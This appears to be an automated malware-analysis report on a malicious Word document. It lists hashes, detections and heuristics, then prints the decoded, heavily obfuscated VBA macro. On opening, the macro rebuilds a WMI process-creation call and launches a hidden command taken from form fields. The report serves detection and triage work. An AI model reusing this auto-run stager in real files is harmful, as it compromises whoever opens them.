Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 e310a9773c4fb185…

MALICIOUS

Office (OLE) / .DOC

Size: 241.0 KB | Created: 2020-01-16 09:37:00 | Authoring application: Microsoft Office Word | First seen: 2026-06-28
MD5: ebbab631283dac26d0dade5f8f0493a2
SHA-1: 0a3aa653f8d024b32bdeb53730ad0681987764ae
SHA-256: e310a9773c4fb18502f56e3e26a2dc3f2f87402a4b8581269cae39882dc99b06
Risk Score: 232

Heuristics (8)

  • ClamAV: Doc.Malware.Chartres-7540846-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Chartres-7540846-0
  • Malformed OLE auto-open stager with embedded ZIP payload [critical] (OLE_RAW_MALFORMED_AUTOOPEN_STAGER)
    Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
  • VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • GetObject call [high] (OLE_VBA_GETOBJ)
    GetObject call
    Matched line in script: Set Kfjlhmfubtbvi = GetObject(Shodtafokxon)
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro [low] (OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script: Private Sub Document_open()
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10988 bytes
SHA-256: 5c25959b38cab32ecf4cb36bf088a8cc5fafd65893f3fd86ea4e5d35830fa2e6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
201 of 316 identifiers look randomly generated (e.g. 'Gcmdhheenkjmh') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Baziplbvb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Uabyesfstbget
End Sub

Attribute VB_Name = "Wqeqntqamvo"
Attribute VB_Base = "0{34E70FD0-AB09-43FF-994B-8DC63C6F8929}{39145296-D93B-4C7A-A758-CB516D06D15B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Fionwdvo"
Function Yrqkwwvxufplb()
   Do While Szuwafpocp = 24
      Loop
            Do While Dqzoewxzdo = 2
            Agaighqeehlst = Sgn(3)
            Licxwhvlfbs = CByte(Hkiecxwteh + Zxfveguihlqb)
      Loop
      Do While Peuvgoze = 63
            Ygqwzuhbtcwk = Cos(234 + CStr(324))
      Loop
            Do While Avxyevthnbh = 5555
            Jauuvalxyqxjm = Hoefoeulqaz
            Rtophvyb = 234
      Loop
            Do While Bjetcezps = 2
            Zyxbcuood = CDbl(4)
            Zkgebicqfmigc = Int(1)
      Loop
            Do While Lrgrlhjvru = 1
            Ebjnvofktny = CInt(Mbmsqsufsjx)
Loop
Irprekqr = ChrW(wdKeyP)
   Do While Jxaamlgia = 24
      Loop
            Do While Jaqkgijcpiyyq = 2
            Omzwiyopd = Sgn(3)
            Laaqbuimw = CByte(Oyauhewlyjjix + Dnzvlmuyw)
      Loop
      Do While Yheqduor = 63
            Wnqjtssy = Cos(234 + CStr(324))
      Loop
            Do While Dwsqunbejuad = 5555
            Gphhgotfv = Ajlrubauq
            Onvqtjhe = 234
      Loop
            Do While Blcdlksnyxal = 2
            Dpnpszivgdat = CDbl(4)
            Vkyrgpyyini = Int(1)
      Loop
            Do While Hsbbdebmd = 1
            Lajgfzdszcro = CInt(Etwfgzhcrb)
Loop
Ipowwpdxslz = Irprekqr + Wqeqntqamvo.Jczsdgzvfgdm + Wqeqntqamvo.Cwliurncvgba
   Do While Wataityx = 24
      Loop
            Do While Xogajcfjv = 2
            Qqtkjdif = Sgn(3)
            Stxgfcuicxzc = CByte(Yymtejuoizgjz + Qqsxleujudzkb)
      Loop
      Do While Bojylkqpao = 63
            Lxavdeim = Cos(234 + CStr(324))
      Loop
            Do While Fvrepspez = 5555
            Yyrzbeozbrjla = Uhwgtgctjn
            Vyzwohhnz = 234
      Loop
            Do While Baumgqwjqvdyh = 2
            Zpweimuwsbbv = CDbl(4)
            Svllmufy = Int(1)
      Loop
            Do While Dndqlrasnvisr = 1
            Jhdblfvb = CInt(Asmvnnavabvid)
Loop
Jdtmcecbfwb = Split(Ipowwpdxslz + LTrim(LTrim(Wqeqntqamvo.Mlxmdusjyclvm. _
Tag)), ",,,,sdf7&&jsad,,,")
   Do While Uotryxjh = 24
      Loop
            Do While Uievqpzgnpzcz = 2
            Ebigqhqhwl = Sgn(3)
            Sybkmsnbftq = CByte(Yyxrarpfft + Axqdbhjd)
      Loop
      Do While Imenklmgk = 63
            Vrjtpwtxlmef = Cos(234 + CStr(324))
      Loop
            Do While Uwxemgjlrq = 5555
            Nhdszjjhfgh = Lqfotdgvbp
            Byekjzticjl = 234
      Loop
            Do While Nvwbgopnsbqd = 2
            Mdrlsodxkewvg = CDbl(4)
            Jbemvghk = Int(1)
      Loop
            Do While Azbjxoglcgek = 1
            Eopkrfkibliz = CInt(Brftyprpconq)
Loop
Yrqkwwvxufplb = Guserfnvhbdr + Join(Jdtmcecbfwb, "") + Guserfnvhbdr
   Do While Dcyaohnq = 24
      Loop
            Do While Odvzqryjhh = 2
            Lmkunkujhlzn = Sgn(3)
            Tvcsegjcq = CByte(Dlorcldmjqmpt + Wqdcdihj)
      Loop
      Do While Hpchjjvm = 63
            Ygsfzvairg = Cos(234 + CStr(324))
      Loop
            Do While Ybktzntnv = 5555
            Nvwbeahqcvk = Yxchhzrrxyr
            Qkiskowpekduw = 234
      Loop
            Do While Qcmnyuubkm = 2
            Kzpwfahjwikkv = CDbl(4)
            Tnznlrib = Int(1)
      Loop
            Do While Dccviygfrl = 1
            Oxuoymhsbsq = CInt(Okyufcyu)
Loop
End Function
Function Uabyesfstbget()
a = ",,,,sdf7&&jsad,,,in,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,m,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,gm,,,,sdf7&&jsad,,,t,,,,sdf7&&jsad,,," + ChrW(wdKeyS) + ",,,,sdf7&&jsad,,,:w,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,i,,,,sdf7&&jsad,,,n3,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,2_" + Wqeqntqamvo.Xcnrzapjuiqim + "r,,,,sdf7&&jsad,,,oces,,,,sdf7&&jsad,,,s"
   Do While Delmrfct = 24
      Loop
            Do While Gtmtcllelkdmu = 2
            Vnqthrmehrbja = Sgn(3)
            Rtlzmdkmcqb = CByte(Cyrksmvrmzt + Pfcabkouskau)
      Loop
      Do While Kbndfwxbizrqn = 63
            Ftstsofjborgv = Cos(234 + CStr(324))
      Loop
            Do While Rplqkpywojv = 5555
            Cjlxuunqiaogf = Ooqcrtibew
            Gxdkxbjhsd = 234
      Loop
            Do While Awyjpxkfyn = 2
            Ttwcuhgaklgse = CDbl(4)
            Fwktluecuvy = Int(1)
      Loop
            Do While Meltpeqdf = 1
            Kwsapqfeyg = CInt(Nuweprbhvv)
Loop
q = ",,,,sdf7&&jsad,,,"
   Do While Aimlxpig = 24
      Loop
            Do While Hwxhontezth = 2
            Tqebhvfmst = Sgn(3)
            Sbydjrqhqk = CByte(Cioskpnw + Tvsnblcdpduwv)
      Loop
      Do While Bqbrwsivdzzh = 63
            Cfgotick = Cos(234 + CStr(324))
      Loop
            Do While Ffnvrfgmcxj = 5555
            Faglzpocdp = Xohcdsrvklq
            Extneosdtbo = 234
      Loop
            Do While Dugobpmhtryky = 2
            Ebtjbyurvpyb = CDbl(4)
            Dmtogpwowk = Int(1)
      Loop
            Do While Flfudgjazsie = 1
            Idlzcodxpfevr = CInt(Pejijsjlalsr)
Loop
Dbctmjfhcy = Split(",,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,w,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,," + a, q)
   Do While Fkcxhxyitlh = 24
      Loop
            Do While Fzqmhuvsfb = 2
            Wegyqvkkozmb = Sgn(3)
            Ivrjvttbrpe = CByte(Fexzjadlts + Pxotgnpj)
      Loop
      Do While Aawfhaumqu = 63
            Egrzcazepc = Cos(234 + CStr(324))
      Loop
            Do While Fwehkcpyt = 5555
            Wcdsdqgb = Esicgkojmxxt
            Lvmbofkrlcvxz = 234
      Loop
            Do While Nibrmbdvferao = 2
            Gcmdhheenkjmh = CDbl(4)
            Jlhoyowbd = Int(1)
      Loop
            Do While Ahxwevlpw = 1
            Vaojdohdow = CInt(Ugtahhjajfzhw)
Loop
Shodtafokxon = Join(Dbctmjfhcy, "")
   Do While Llsulkxuwi = 24
      Loop
            Do While Ugqxsghqiqo = 2
            Iptucvxmxmkee = Sgn(3)
            Etojmglzfk = CByte(Nuduwuvduezt + Cwtgsnmylocel)
      Loop
      Do While Qokxdksusnkjq = 63
            Uuxmdpgy = Cos(234 + CStr(324))
      Loop
            Do While Fojpsrjcheqo = 5555
            Pkcbsievjk = Hyohjpsex
            Ezvbgjkkfy = 234
      Loop
            Do While Tmefjnkfyvljk = 2
            Uawrltbx = CDbl(4)
            Hxmyanjuavuej = Int(1)
      Loop
            Do While Npkjomqtiqjj = 1
            Esocjbpx = CInt(Hbpjsfprnaydq)
Loop
Set Kfjlhmfubtbvi = GetObject(Shodtafokxon)
   Do While Xifynatlenb = 24
      Loop
            Do While Veznokzis = 2
            Vchqosapji = Sgn(3)
            Xonnrqwtwqo = CByte(Btyrwhepwcks + Lmmhzkqbyawis)
      Loop
      Do While Nfonynzcxmbgy = 63
            Cvptkhkjoj = Cos(234 + CStr(324))
      Loop
            Do While Uxuopiqiwweej = 5555
            Ouydsalybs = Scvaexneed
            Yhspgqlkyw = 234
      Loop
            Do While Pfizjzsvqwy = 2
            Wahvhgkw = CDbl(4)
            Khvrlhonv = Int(1)
      Loop
            Do While Kzoovekcv = 1
            Mojqdoqqks = CInt(Xrnhgnci)
Loop
Wdyoaxnvx = Shodtafokxon + ChrW(wdKeyS) + Wqeqntqamvo.Iblaypsyp.ControlTipText$ + Wqeqntqamvo.Nnkgiuoz.ControlTipText
   Do While Bwsfphkk = 24
      Loop
            Do While Mjyyipsnndot = 2
            Qlsfrnjah = Sgn(3)
            Idzjcjwx = CByte(Jtuiwyiormih + Doetbjmbquz)
      Loop
      Do While Dltrvykhsywv = 63
            Lqvvbolg = Cos(234 + CStr(324))
      Loop
            Do While Dwhhhdaj = 5555
            Edxumidgk = Xlhaluyyx
            Xpozqdapxnljw = 234
      Loop
            Do While Ajslfvxwfkag = 2
            Blmyifhgns = CDbl(4)
            Vsulcksst = Int(1)
      Loop
            Do While Lbaatioqx = 1
            Wcylodmtv = CInt(Yaebtipndp)
Loop
Lkjqsexwqz = Wdyoaxnvx + Wqeqntqamvo.Xcnrzapjuiqim
   Do While Oikdcrvvv = 24
      Loop
            Do While Dkdyqwnvnqp = 2
            Qkuwlnswl = Sgn(3)
            Sixvvaugq = CByte(Uugzibqvq + Bmsxzjhgs)
      Loop
      Do While Yfhzsanwi = 63
            Lpzplfrfp = Cos(234 + CStr(324))
      Loop
            Do While Ngkdxakzj = 5555
            Nwbsjjqiuq = Bcxkxbpmbuts
            Ocmlicwycdo = 234
      Loop
            Do While Hphspvljazqny = 2
            Lsdiruunvjhpy = CDbl(4)
            Uvdfiwuc = Int(1)
      Loop
            Do While Pfocvxkjznjzf = 1
            Ncljhgmh = CInt(Ujslarpzm)
Loop
Set Uabyesfstbget = GetObject(Lkjqsexwqz)
   Do While Dgsnxwwyx = 24
      Loop
            Do While Lbhrmzmpg = 2
            Cdlasgljnycpa = Sgn(3)
            Fzxaesaylu = CByte(Cgrzqdfeobwdq + Agjlgodtnrf)
      Loop
      Do While Cfagphicw = 63
            Muxuecukrf = Cos(234 + CStr(324))
      Loop
            Do While Cjwjzmdikeac = 5555
            Qojekegw = Rjpkxvhzcn
            Sxjpsrcitvkdm = 234
      Loop
            Do While Muulfjks = 2
            Skpwazwctwmvu = CDbl(4)
            Ursvzmyruvf = Int(1)
      Loop
            Do While Snietszg = 1
            Tvnasjoqzi = CInt(Srxqlutuav)
Loop
Uabyesfstbget. _
showwindow = False
   Do While Hxiwirce = 24
      Loop
            Do While Ldlbxeocnt = 2
            Rcnctxnfgpyc = Sgn(3)
            Sdmqsjer = CByte(Lspvcgpykof + Gxerjdvfix)
      Loop
      Do While Kqxahozsaq = 63
            Rdzaasoum = Cos(234 + CStr(324))
      Loop
            Do While Sosvooidv = 5555
            Rqrydagnip = Zgdvfpiczpkel
            Ldrnfpimjico = 234
      Loop
            Do While Ympwstpktcn = 2
            Jbfmmohujqc = CDbl(4)
            Quumdauob = Int(1)
      Loop
            Do While Isvdakoatyyk = 1
            Pahtovnflcvqg = CInt(Sbixjdutdu)
Loop
Do While Kfjlhmfubtbvi.Create(n & Yrqkwwvxufplb, Qwxgfjsix, Uabyesfstbget, Hdolqqhqrp)
Loop
   Do While Rifipuhxlsio = 24
      Loop
            Do While Trukyageksxa = 2
            Lavgadgkob = Sgn(3)
            Hykkziew = CByte(Bfvvmmxmko + Llxcobkjctdwt)
      Loop
      Do While Ztpwkzbyqler = 63
            Cqsojmznxu = Cos(234 + CStr(324))
      Loop
            Do While Ahhbycesys = 5555
            Dzkmhqjkqwad = Kuulwutzyt
            Mcmbnjuzlkc = 234
      Loop
            Do While Gkrudhepq = 2
            Xmwazdarvs = CDbl(4)
            Ypirimxzs = Int(1)
      Loop
            Do While Qkcfulmzw = 1
            Danuahjl = CInt(Bctevqvdssq)
Loop
End Function